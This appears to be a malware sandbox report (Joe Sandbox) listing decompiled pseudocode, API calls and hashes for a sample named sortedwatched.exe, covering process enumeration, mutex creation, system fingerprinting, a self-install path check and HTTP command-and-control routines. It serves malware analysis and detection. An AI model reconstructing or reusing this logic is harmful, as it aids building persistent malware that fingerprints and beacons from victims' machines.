                  Similarity
                  • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                  • String ID:
                  • API String ID: 1741791824-0
                  • Opcode ID: 0d54c19cca61c3b923c66ea9474d8b0119caa62e74d77989c331ed76ff960556
                  • Instruction ID: de09d5a240a5615813d0bbbfcfa054314b958373cb91725100eb0eecfb42de7b
                  • Opcode Fuzzy Hash: 0d54c19cca61c3b923c66ea9474d8b0119caa62e74d77989c331ed76ff960556
                  • Instruction Fuzzy Hash: 9E216271A00245FBDF206FA69C49DAF7ABDDBC5760B10813EB905A23A1DA788D508B64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00401943(void* __edx) {
                  				void* _v560;
                  				void* _t5;
                  				struct tagPROCESSENTRY32W* _t6;
                  				int _t7;
                  				void* _t9;
                  				void* _t12;
                  				void* _t13;
                  
                  				_t12 = __edx; // executed
                  				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                  				_t13 = _t5;
                  				if(_t13 != 0xffffffff) {
                  					_t6 =  &_v560;
                  					_v560 = 0x22c;
                  					Process32FirstW(_t13, _t6); // executed
                  					while(_t6 != 0) {
                  						_t9 = E00402255( &_v560, _t12); // executed
                  						if(_t9 != 0) {
                  							_t6 = Process32NextW(_t13,  &_v560); // executed
                  							continue;
                  						}
                  						break;
                  					}
                  					_t7 = CloseHandle(_t13); // executed
                  					return _t7;
                  				}
                  				return _t5;
                  			}











                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00401973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401983
                  • CloseHandle.KERNEL32(00000000), ref: 0040199F
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(0040C6D4,00000000,?,?,0040199A,0000022C,0040C6D4), ref: 00402273
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(?,0040199A,0000022C,0040C6D4), ref: 00402284
                    • Part of subcall function 00402255: lstrcpyW.KERNEL32(00000004,0000022C), ref: 004022B6
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction ID: 16848b0ed7bca5f6eaa718ca54d67b5e4b9d7aaec9667f6a8c5e1db911b667c7
                  • Opcode Fuzzy Hash: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction Fuzzy Hash: 93F096715011287AD720AB79AC0CFEF7B7CDB49711F1081B2ED05F21D0D7388A058A99
                  Uniqueness

                  Uniqueness Score: 0.04%

                  C-Code - Quality: 68%
                  			E0040C54E(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t10;
                  
                  				_t5 = E00401A52(0x412340, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t10 = CreateMutexW(0, 0,  &_v132); // executed
                  				 *0x41365c = _t10;
                  				return 0 | _t10 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C576
                  • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C58E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction ID: 36c13beeff52031c9d9f833bd8c6959bb0ee47b01addbbb580c4d20d437467e3
                  • Opcode Fuzzy Hash: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction Fuzzy Hash: F5F0EC717041145BD7146BA96C06BEA376CEB44305F00817EFA09E72D0EE34D91047DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0040C4F5(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t10;
                  
                  				_t5 = E00401A52(0x4128e0, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t10 = CreateMutexW(0, 0,  &_v132); // executed
                  				 *0x41548c = _t10;
                  				return 0 | _t10 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C51D
                  • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C535
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction ID: 146b9e719d585fa1db09a36da7744ebe958f35a2f64565dee515f9001fd86055
                  • Opcode Fuzzy Hash: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction Fuzzy Hash: 3FF0E5717442149BD700ABA9AC06BEE36ACEB44305F00803EFA09EB2D0EE3498148BDD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00402561(signed int _a8, signed int _a12) {
                  				void* _t6;
                  
                  				_t6 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 * _a12); // executed
                  				return _t6;
                  			}




                  0x00402575
                  0x0040257c

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0040256E
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402575
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction ID: 7b0aceb4be34622b36046658aba6f4cfe0c30366996fb5ad577a8c43a0e85ff0
                  • Opcode Fuzzy Hash: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction Fuzzy Hash: 98C08C32100308ABCB009FD8ED49DAA77ACFB48A02F00C010BA18CA090DA30F6008BA4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {
                  				void* _t2;
                  
                  				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
                  				return _t2;
                  			}




                  0x004014fc
                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {
                  				void* _t2;
                  
                  				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
                  				return _t2;
                  			}




                  0x004014fc
                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 94%
                  			E0040C682(void* __edi, void* __eflags) {
                  				char _v12;
                  				char _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				char _v40;
                  				char _v48;
                  				char _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				signed int _v80;
                  				void* __esi;
                  				intOrPtr _t42;
                  				intOrPtr _t44;
                  				void* _t49;
                  				void* _t55;
                  				signed int _t60;
                  				signed int _t78;
                  				void* _t93;
                  				void* _t94;
                  				void* _t95;
                  
                  				_t95 = __eflags;
                  				_t93 = __edi;
                  				_t5 = GetTickCount() % 0xea60 + 0xcd140; // 0xcd140
                  				_t94 = _t5;
                  				_t42 = E0040FA9B();
                  				_v80 = _v80 & 0x00000000;
                  				_v76 = _t42;
                  				_v72 =  *0x413b6c(_t42);
                  				_t44 = E00402398(); // executed
                  				_v68 = _t44;
                  				_v64 = E00401E04();
                  				_v60 = E0040FA95();
                  				E004022D2( &_v56); // executed
                  				E0040FCF6( &_v48);
                  				_t49 = E0040C901( &_v20,  &_v80, _t95);
                  				_t96 = _t49;
                  				if(_t49 != 0) {
                  					_t55 = E00406104(_t96,  &_v20,  &_v12); // executed
                  					if(_t55 == 0) {
                  						_t33 = GetTickCount() % 0xbb8;
                  						__eflags = _t33;
                  						_t94 = 0xbb8 + _t33;
                  						E00406297();
                  					} else {
                  						_t60 = _v80;
                  						_t78 = 3;
                  						_t98 = _t60 % _t78;
                  						if(_t60 % _t78 == 0) {
                  							E0040F9DF();
                  						}
                  						if(E0040C9A3( &_v12,  &_v40, _t98) != 0 && _v40 == 0) {
                  							L0040FDBC();
                  							_t91 = _v32;
                  							_t101 = _v32;
                  							if(_v32 != 0) {
                  								E0040F99A(_v36, _t91, _t93, _t94, _t101);
                  							}
                  							_t92 = _v24;
                  							_t102 = _v24;
                  							if(_v24 != 0) {
                  								E0040FD40(_v28, _t92, _t102);
                  								_t94 = 0;
                  							}
                  						}
                  						E00401532(_v12);
                  					}
                  					E00401532(_v20);
                  				}
                  				E00401532(_v48);
                  				E00401532(_v56);
                  				return _t94;
                  			}





























                  APIs
                  • GetTickCount.KERNEL32(00000102,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C7C7), ref: 0040C689
                  • lstrlen.KERNEL32(00000000), ref: 0040C6AB
                    • Part of subcall function 00402398: RtlGetVersion.NTDLL(?), ref: 004023B2
                    • Part of subcall function 00402398: GetNativeSystemInfo.KERNEL32(?), ref: 004023BC
                    • Part of subcall function 004022D2: lstrlenW.KERNEL32(0040C6D8,00000000,000CD140,00000104,?,?,?,0040C6D4), ref: 00402309
                    • Part of subcall function 00406104: _snwprintf.NTDLL ref: 004061A8
                  • GetTickCount.KERNEL32 ref: 0040C759
                    • Part of subcall function 0040F9DF: _snwprintf.NTDLL ref: 0040FA1D
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick_snwprintflstrlen$InfoNativeSystemVersion
                  • String ID:
                  • API String ID: 1305535675-0
                  • Opcode ID: a77bdd8919f3a98efa0655e863ed0fe1dd9cf25eb4df3c2379527960c1d06637
                  • Instruction ID: 81ffacd0aac2abb408ebbc200e15fd6d71b5808331c641d14e665e1cf29e0c87
                  • Opcode Fuzzy Hash: a77bdd8919f3a98efa0655e863ed0fe1dd9cf25eb4df3c2379527960c1d06637
                  • Instruction Fuzzy Hash: 80317E31E0010A9BCF14EBA6D8955EEB7B6AF84304F54813FE402776D1EF38A906CB58
                  Uniqueness

                  Uniqueness Score: 0.05%

                  C-Code - Quality: 100%
                  			E0040F92D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                  				intOrPtr _t1;
                  				int _t9;
                  				intOrPtr _t16;
                  				void* _t20;
                  				void* _t24;
                  
                  				_t24 = __eflags;
                  				_t20 = __edx;
                  				_t16 = __ecx;
                  				_t1 =  *0x415488; // 0x3c4e0000
                  				 *0x4164e0 = _t1;
                  				E0040F16B();
                  				E0040F149();
                  				E0040F26C();
                  				E0040F292();
                  				E0040F3C5(); // executed
                  				E0040F43E(__ebx); // executed
                  				E0040F2EE(_t24); // executed
                  				_t9 = lstrcmpiW("C:\Windows\system32\sortedwatched.exe", 0x416840);
                  				if(_t9 != 0) {
                  					E0040F63A(_t16, _t20, __edi, __eflags);
                  					__eflags =  *0x415f4c;
                  					if( *0x415f4c == 0) {
                  						__eflags = 0;
                  						E00401CC2(0x416840, 0, _t16, 0);
                  					} else {
                  						E0040F7A0();
                  					}
                  					__eflags = 1;
                  					return 1;
                  				} else {
                  					return _t9;
                  				}
                  			}









                  APIs
                    • Part of subcall function 0040F16B: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                    • Part of subcall function 0040F16B: CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                    • Part of subcall function 0040F149: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\system32\sortedwatched.exe,00000104,00000000,00000102,0040F942,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F162
                    • Part of subcall function 0040F292: _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F3C5: CreateFileW.KERNEL32(C:\Windows\system32\sortedwatched.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                    • Part of subcall function 0040F3C5: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                    • Part of subcall function 0040F3C5: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                    • Part of subcall function 0040F3C5: GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                    • Part of subcall function 0040F3C5: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                    • Part of subcall function 0040F3C5: UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                    • Part of subcall function 0040F3C5: CloseHandle.KERNEL32(00000000), ref: 0040F42D
                    • Part of subcall function 0040F3C5: CloseHandle.KERNEL32(00000000), ref: 0040F434
                    • Part of subcall function 0040F43E: GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                    • Part of subcall function 0040F43E: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                    • Part of subcall function 0040F43E: _snprintf.NTDLL ref: 0040F4EF
                    • Part of subcall function 0040F2EE: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?), ref: 0040F33C
                    • Part of subcall function 0040F2EE: _snwprintf.NTDLL ref: 0040F3A1
                    • Part of subcall function 0040F2EE: DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  • lstrcmpiW.KERNEL32(C:\Windows\system32\sortedwatched.exe,C:\Windows\system32\sortedwatched.exe,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F966
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateNameView_snwprintf$ByteCharComputeComputerCrc32DeleteFolderManagerMappingModuleMultiOpenPathServiceSizeUnmapWide_snprintflstrcmpi
                  • String ID: C:\Windows\system32\sortedwatched.exe$C:\Windows\system32\sortedwatched.exe
                  • API String ID: 2225404385-3820085027
                  • Opcode ID: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction ID: bd7696f8d282200fc694e3ca5d6ba9f1d35f343fb67aa0c3943ac94685ea35c3
                  • Opcode Fuzzy Hash: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction Fuzzy Hash: 29F08232619501A6D634B7F7B8067CB12855F81319B16847FF440B5DD2DE3C884A856E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040C84E(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                  				signed int _t6;
                  				long _t9;
                  				void* _t12;
                  				void* _t17;
                  				signed int _t19;
                  				void* _t24;
                  
                  				_t24 = __eflags;
                  				_t17 = __edi;
                  				_t12 = __ebx;
                  				_t6 = GetTickCount();
                  				_t16 = _t6 % 0xfa0;
                  				_t19 = _t6 % 0xfa0; // executed
                  				E0040C493(); // executed
                  				_t9 = E0040C601(_t24);
                  				if(_t9 != 0) {
                  					_t5 = _t19 + 0xfa0; // 0xfa0
                  					_t9 = WaitForSingleObject( *0x414e6c, _t5);
                  					while(_t9 == 0x102) {
                  						_t9 = WaitForSingleObject( *0x414e6c, E0040C78F(_t12, _t16, _t17));
                  					}
                  				}
                  				return _t9;
                  			}










                  APIs
                  • GetTickCount.KERNEL32(00000000,?,?,0040F111), ref: 0040C856
                    • Part of subcall function 0040C493: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C4A8
                    • Part of subcall function 0040C493: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00415488,00000000,00000000,00000000,00000000), ref: 0040C4EB
                    • Part of subcall function 0040C601: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                    • Part of subcall function 0040C601: SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                    • Part of subcall function 0040C601: ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                    • Part of subcall function 0040C601: ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                    • Part of subcall function 0040C601: CloseHandle.KERNEL32 ref: 0040C677
                  • WaitForSingleObject.KERNEL32(00000FA0), ref: 0040C882
                  • WaitForSingleObject.KERNEL32(00000000), ref: 0040C89B
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: ObjectWait$Single$CloseCountDirectoryEventHandleInformationMutexReleaseResetSignalTickVolumeWindows
                  • String ID:
                  • API String ID: 1052563600-0
                  • Opcode ID: 0633e936a088fcb8b38c62daec32763aaef1651ac7ccb6cf648d26e93326d8c7
                  • Instruction ID: c69442cc489c2c4f0668fa5bec6b92153ca26a26e28d5911284e54d6033ab6a8
                  • Opcode Fuzzy Hash: 0633e936a088fcb8b38c62daec32763aaef1651ac7ccb6cf648d26e93326d8c7
                  • Instruction Fuzzy Hash: 89E0E532500101DBE7207BB1AC894BA7299EB85312F14C376FC59E22E4DE798D1096EE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E004022D2(intOrPtr* __ecx) {
                  				void* _v8;
                  				signed int _v12;
                  				intOrPtr* _v16;
                  				intOrPtr* _v20;
                  				intOrPtr* _t26;
                  				intOrPtr _t28;
                  				intOrPtr _t35;
                  				int _t38;
                  				intOrPtr* _t39;
                  				intOrPtr* _t40;
                  				signed int _t41;
                  				intOrPtr* _t47;
                  				short _t48;
                  				signed int _t55;
                  				signed int _t57;
                  				intOrPtr* _t59;
                  				intOrPtr* _t61;
                  				WCHAR* _t62;
                  
                  				_t39 = __ecx;
                  				_v16 = __ecx;
                  				_t26 = __ecx + 4;
                  				_v8 = 0;
                  				_v12 = 0;
                  				_t55 = 0;
                  				 *__ecx = 0;
                  				_v20 = _t26;
                  				 *_t26 = 0; // executed
                  				E00401943( &_v8); // executed
                  				_t59 = _v8;
                  				if(_t59 != 0) {
                  					_t41 = 0;
                  					do {
                  						_t8 = _t59 + 4; // 0x40c6d8
                  						_t38 = lstrlenW(_t8);
                  						_t59 =  *_t59;
                  						_t41 = _t41 + 1 + _t38;
                  					} while (_t59 != 0);
                  					_v12 = _t41;
                  					_t39 = _v16;
                  				}
                  				_t28 = E004014F2(_v12 + _v12);
                  				_v12 = _t28;
                  				if(_t28 != 0) {
                  					_t40 = _v8;
                  					while(_t40 != 0) {
                  						_t14 = _t40 + 4; // 0x40c6d8
                  						_t62 = _t14;
                  						lstrcpyW(_t28 + _t55 * 2, _t62);
                  						_t57 = _t55 + lstrlenW(_t62);
                  						_t28 = _v12;
                  						_t48 = 0x2c;
                  						 *((short*)(_t28 + _t57 * 2)) = _t48;
                  						_t55 = _t57 + 1;
                  						_t40 =  *_t40;
                  					}
                  					_t35 = E00402424(_t28, _t55, _v20);
                  					_t39 = _v16;
                  					 *_t39 = _t35;
                  					E00401532(_v12);
                  				}
                  				_t47 = _v8;
                  				if(_t47 != 0) {
                  					do {
                  						_t61 =  *_t47;
                  						E00401532(_t47);
                  						_t47 = _t61;
                  					} while (_t61 != 0);
                  				}
                  				return 0 |  *_t39 != 0x00000000;
                  			}






















                  APIs
                    • Part of subcall function 00401943: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401954
                    • Part of subcall function 00401943: Process32FirstW.KERNEL32(00000000,?), ref: 00401973
                    • Part of subcall function 00401943: CloseHandle.KERNEL32(00000000), ref: 0040199F
                  • lstrlenW.KERNEL32(0040C6D8,00000000,000CD140,00000104,?,?,?,0040C6D4), ref: 00402309
                  • lstrcpyW.KERNEL32(00000000,0040C6D8), ref: 0040233C
                  • lstrlenW.KERNEL32(0040C6D8,?,?,?,0040C6D4), ref: 00402343
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CloseCreateFirstHandleProcess32SnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 17659468-0
                  • Opcode ID: 9b1a24f769ae4d82b2c2dcec2bffea6d6a32330a0e616b71de6e0109279ee6a3
                  • Instruction ID: a1b1e07c88102afd1e208d79554f5a107a99b0a779c10993015063021bd553f4
                  • Opcode Fuzzy Hash: 9b1a24f769ae4d82b2c2dcec2bffea6d6a32330a0e616b71de6e0109279ee6a3
                  • Instruction Fuzzy Hash: 7D217E71A04214EBCB24DFA4D58499EBBB4EF48310B1440BED905EB391DB78AE00CB58
                  Uniqueness

                  Uniqueness Score: 0.04%

                  C-Code - Quality: 89%
                  			E00406104(void* __eflags, intOrPtr* _a4, signed int* _a8) {
                  				intOrPtr _v8;
                  				signed int* _v12;
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v32;
                  				char _v40;
                  				char _v48;
                  				char _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				char _v1212;
                  				char _v2236;
                  				intOrPtr _t42;
                  				void* _t48;
                  				void* _t50;
                  				void* _t55;
                  				void* _t61;
                  				signed int _t66;
                  				signed int _t68;
                  				intOrPtr _t73;
                  				void* _t86;
                  				signed char* _t99;
                  				signed int* _t106;
                  				intOrPtr _t107;
                  
                  				_t3 = _a4 + 4; // 0xff00414e
                  				_v24 = 0x10;
                  				_t42 = E00405E88( *_a4,  *_t3, __eflags,  &_v16); // executed
                  				_t106 = _a8;
                  				_t107 = _t42;
                  				_v20 = _t107;
                  				 *_t106 =  *_t106 & 0x00000000;
                  				_t106[1] = _t106[1] & 0x00000000;
                  				_t73 =  *0x41652c + 1;
                  				 *0x41652c = _t73;
                  				_t113 = _t107;
                  				if(_t107 != 0) {
                  					if(E004062D8( &_v32,  &_v24, _t113) != 0) {
                  						_t48 = E0040207B( &_v32,  &_v40);
                  						_t115 = _t48;
                  						if(_t48 != 0) {
                  							_t50 = E00401A52(0x412270, 0x680f9b3);
                  							_t99 =  *0x416524;
                  							 *0x4143a4( &_v180, 0x40, _t50, _t99[3] & 0x000000ff, _t99[2] & 0x000000ff, _t99[1] & 0x000000ff,  *_t99 & 0x000000ff);
                  							L00401B09(_t50);
                  							_t55 = E00405FA4( &_v180,  &_v40, _t115,  &_v2236);
                  							_pop(_t86);
                  							_t116 = _t55;
                  							if(_t55 != 0) {
                  								_t61 = E0040140A( &_v180, ( *0x416524)[4], _t116,  &_v2236,  &_v1212, _t86, _v188, _v184,  &_v48); // executed
                  								if(_t61 != 0) {
                  									if(E0040215A( &_v180,  &_v48,  &_v12) != 0) {
                  										_t92 = _v12;
                  										_t30 =  &(_t106[1]); // 0x40c700
                  										_t103 = _t30;
                  										_t66 =  *_v12;
                  										 *_t30 = _t66;
                  										if(_t66 < 0x1000000) {
                  											_t68 = E00405ED3( &(_t92[1]), _v8 - 4, _t103);
                  											_t92 = _v12;
                  											 *_t106 = _t68;
                  										}
                  										E00401532(_t92);
                  									}
                  									E00401532(_v48);
                  								}
                  								E004060BA( &_v2236);
                  							}
                  							E00401532(_v40);
                  							_t107 = _v20;
                  						}
                  						E00401532(_v32);
                  					}
                  					E00401532(_t107);
                  					_t73 =  *0x41652c;
                  				}
                  				_t74 =  !=  ? 0 : _t73;
                  				 *0x41652c =  !=  ? 0 : _t73;
                  				return 0 |  *_t106 != 0x00000000;
                  			}





























                  APIs
                  • _snwprintf.NTDLL ref: 004061A8
                    • Part of subcall function 00405FA4: _snwprintf.NTDLL ref: 00406000
                    • Part of subcall function 00405FA4: GetTickCount.KERNEL32 ref: 00406042
                    • Part of subcall function 0040140A: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000,0040C6FC,00000000,00000104,?,?,?), ref: 00401429
                    • Part of subcall function 0040140A: InternetConnectW.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00401445
                    • Part of subcall function 0040140A: HttpSendRequestW.WININET(00000000,000000FF,000000FF,?,?), ref: 0040149F
                    • Part of subcall function 0040140A: InternetCloseHandle.WININET(00000000), ref: 004014C7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$_snwprintf$CloseConnectCountHandleHttpOpenRequestSendTick
                  • String ID: g8Cw
                  • API String ID: 696445947-3103284439
                  • Opcode ID: 330aba8408174432a22468a66f18df5f331fc659532ddb7950c23e4088fe1013
                  • Instruction ID: a199245709a9ee0ab4ea84b2f4d67a79545613f660e739969ce5274ddc5caeb1
                  • Opcode Fuzzy Hash: 330aba8408174432a22468a66f18df5f331fc659532ddb7950c23e4088fe1013
                  • Instruction Fuzzy Hash: CB41A57190011ADBCB14EB65D850AEEB7B9FF48304F1081BEE446B7295EB34AE45CF98
